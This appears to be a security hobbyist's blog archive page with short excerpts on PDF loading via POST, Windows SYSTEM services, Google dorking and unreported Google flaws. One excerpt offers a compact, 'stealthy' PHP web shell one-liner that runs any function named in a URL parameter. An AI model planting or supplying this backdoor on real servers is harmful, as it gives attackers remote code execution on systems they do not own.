Archive for ‘Documentation’
Some time ago I was in the need for a way in javascript to send a POST data to a file and load it’s contents in iframe format, the contents were in the form of application/PDF and the PDF would vary from what I would send in my POST values. Non-challenging as it sounds it still took me some time to figure out – not a problem should be solved…
More+
Have you ever needed a small shell written in PHP?
Of course you have. But I bet it haven’t been all too stealth!
This is really pointless, but someone might be interested in it.
So here you go folks!
<?=($_=@$_GET[2]).@$_($_GET[1])?>
More+
Just to clear things out, the title appears more frightening than it actually is. As we all know, Microsoft Windows have this passion for running background services. Most of those services are running under a greatly privileged account called SYSTEM.
More+
Google and all of it’s services must be the most advanced and handy SaaS-solution(s) ever created. Google is also known to be the “hackers best friend”. …so why bother to run automated “Google-Dork Scanners” manually, when Google just as well could do the job for you?
More+
I don’t normally disclose vulnerabilities for web applications – but it’s Google. I’ve been mailing them – and they told me I didn’t find anything of relevance. So they decided not to patch the vulnerabilities. …and if there isn’t any vulnerabilites, I must be able to write about them right?
More+